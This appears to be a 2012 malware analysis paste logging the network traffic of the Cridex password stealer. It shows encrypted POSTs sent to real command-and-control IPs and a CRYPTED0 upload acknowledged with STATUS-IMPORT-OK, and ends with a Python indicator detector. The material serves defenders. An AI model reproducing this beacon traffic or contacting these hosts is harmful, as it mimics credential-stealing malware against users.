===========================
#MalwareMustDie - BHEK2 PD079
Cridex - Password stealer
NETWORK ACTIVITY EVIDENCE
@unixfreaxjp /malware]$ date
Sun Dec 9 21:21:01 JST 2012
===========================
An HTTP/1.1 POST request was sent to 180.235.150.72:8080 containing encrypted data:
// 192.168.7.84 ---> 180.235.150.72 HTTP/POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
00000000 50 4f 53 54 20 2f 4e 35 6e 6d 4c 43 41 41 41 2f POST /N5 nmLCAAA/
00000010 4c 78 63 71 4b 41 41 2f 47 4c 6b 4f 56 43 41 41 LxcqKAA/ GLkOVCAA
00000020 41 41 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 AA/ HTTP /1.1..Ac
00000030 63 65 70 74 3a 20 2a 2f 2a 0d 0a 55 73 65 72 2d cept: */ *..User-
00000040 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 Agent: M ozilla/5
00000050 2e 30 20 28 57 69 6e 64 6f 77 73 3b 20 55 3b 20 .0 (Wind ows; U;
00000060 4d 53 49 45 20 37 2e 30 3b 20 57 69 6e 64 6f 77 MSIE 7.0 ; Window
00000070 73 20 4e 54 20 36 2e 30 3b 20 65 6e 2d 55 53 29 s NT 6.0 ; en-US)
00000080 0d 0a 48 6f 73 74 3a 20 31 38 30 2e 32 33 35 2e ..Host: 180.235.
00000090 31 35 30 2e 37 32 3a 38 30 38 30 0d 0a 43 6f 6e 150.72:8 080..Con
000000A0 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 34 37 tent-Len gth: 347
000000B0 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 ..Connec tion: Ke
000000C0 65 70 2d 41 6c 69 76 65 0d 0a 43 61 63 68 65 2d ep-Alive ..Cache-
000000D0 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 Control: no-cach
000000E0 65 0d 0a 0d 0a e....
The server at 180.235.150.72 answered by sending the binary to the test PC:
// 180.235.150.72 ===> 192.168.7.84 TCP [TCP segment of a reassembled PDU]
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 09 Dec 2012 07:19:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
There were more than 3 (three) attempts to complete a TCP handshake with remote IP 132.248.49.112, each of them reset by the remote side:
192.168.7.84 ===> 132.248.49.112 TCP netarx > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
132.248.49.112 => 192.168.7.84 TCP http-alt > netarx [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
It also tried to handshake with remote IP 113.130.65.77, again reset:
192.168.7.84 ===> 113.130.65.77 TCP optima-vnet > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
113.130.65.77 ==> 192.168.7.84 TCP http-alt > optima-vnet [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
It then communicates over HTTP with 203.113.98.131:80:
192.168.7.84 ===> 203.113.98.131 HTTP POST /asp/intro.php HTTP/1.0
Request sent:
--------------
POST /asp/intro.php HTTP/1.0
Host: 203.113.98.131
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 251
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
CRYPTED0...DK.V..aa..c.....PI%.^D.|2.s;.p..T=....*.........
Response received:
-------------------
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 09 Dec 2012 07:21:47 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 16
STATUS-IMPORT-OK
It also connects to remote IP 173.224.221.135:8080 to send the POST data; the recorded communication follows:
192.168.7.84 ===> 173.224.221.135 HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 173.224.221.135:8080
Content-Length: 408
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 09 Dec 2012 07:22:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 173.224.221.135:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 09 Dec 2012 07:22:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
It also sends the POST data to 206.176.226.157:8080, as follows:
192.168.7.84 ===> 206.176.226.157 HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 206.176.226.157:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 09 Dec 2012 07:23:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
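A small detector over the indicators this capture documents, added here as an example and not part of the original paste: the three-segment beacon path POSTed to port 8080, the malformed MSIE User-Agent, the CRYPTED0 body marker on /asp/intro.php and the STATUS-IMPORT-OK reply. The sample messages are constructed from the headers recorded above with shortened bodies, and the indicator labels are my own.

```python
import re

# Indicators documented in the capture above: the three-segment beacon path POSTed to
# port 8080, the malformed "Mozilla/5.0 (Windows; U; MSIE ...)" User-Agent, the CRYPTED0
# marker at the start of the /asp/intro.php body and the STATUS-IMPORT-OK reply.
BEACON_PATH = re.compile(r"^/[A-Za-z0-9]{5,12}/[A-Za-z0-9]{5,12}/[A-Za-z0-9]{5,12}/$")
BOGUS_UA = re.compile(r"^Mozilla/5\.0 \(Windows; U; MSIE \d+\.\d+;")  # real IE: Mozilla/4.0 (compatible; MSIE ...

def parse_http(raw: bytes):
    """Split one raw HTTP message into (start line, lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def cridex_indicators(raw_request: bytes, dst_port: int, raw_response: bytes = b"") -> list:
    """Return the indicator labels (my own names) present in one request/response pair."""
    start, hdr, body = parse_http(raw_request)
    parts = start.split(" ")
    method, path = parts[0], (parts[1] if len(parts) > 1 else "")
    hits = []
    if method == "POST" and dst_port == 8080 and BEACON_PATH.match(path):
        hits.append("beacon-path-on-8080")
    if BOGUS_UA.match(hdr.get("user-agent", "")):
        hits.append("bogus-msie-user-agent")
    if body.startswith(b"CRYPTED0") and hdr.get("content-encoding") == "binary":
        hits.append("crypted0-blob")
    if raw_response:
        _, _, rbody = parse_http(raw_response)
        if rbody.strip() == b"STATUS-IMPORT-OK":
            hits.append("status-import-ok")
    return hits

# Constructed samples modelled on the recorded requests (bodies shortened, lengths adjusted).
BEACON_REQ = (b"POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1\r\nAccept: */*\r\n"
              b"User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)\r\n"
              b"Host: 180.235.150.72:8080\r\nContent-Length: 4\r\nConnection: Keep-Alive\r\n"
              b"Cache-Control: no-cache\r\n\r\n\x15\x7d\x92\x25")
INTRO_REQ = (b"POST /asp/intro.php HTTP/1.0\r\nHost: 203.113.98.131\r\nAccept: */*\r\n"
             b"Content-Length: 12\r\nConnection: close\r\nContent-Type: application/octet-stream\r\n"
             b"Content-Encoding: binary\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n"
             b"\r\nCRYPTED0\x00\x01\x02\x03")
INTRO_RESP = (b"HTTP/1.1 200 OK\r\nServer: nginx/1.0.10\r\nContent-Type: text/html; charset=windows-1251\r\n"
              b"Connection: close\r\nContent-Length: 16\r\n\r\nSTATUS-IMPORT-OK")
BENIGN_REQ = (b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n"
              b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\r\n\r\n")
```

Running `cridex_indicators(BEACON_REQ, 8080)` flags the beacon path and the bogus User-Agent, while the intro.php pair is flagged on the CRYPTED0 marker and the STATUS-IMPORT-OK acknowledgement and the benign request is not flagged at all.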
----
#MalwareMustDie!!!!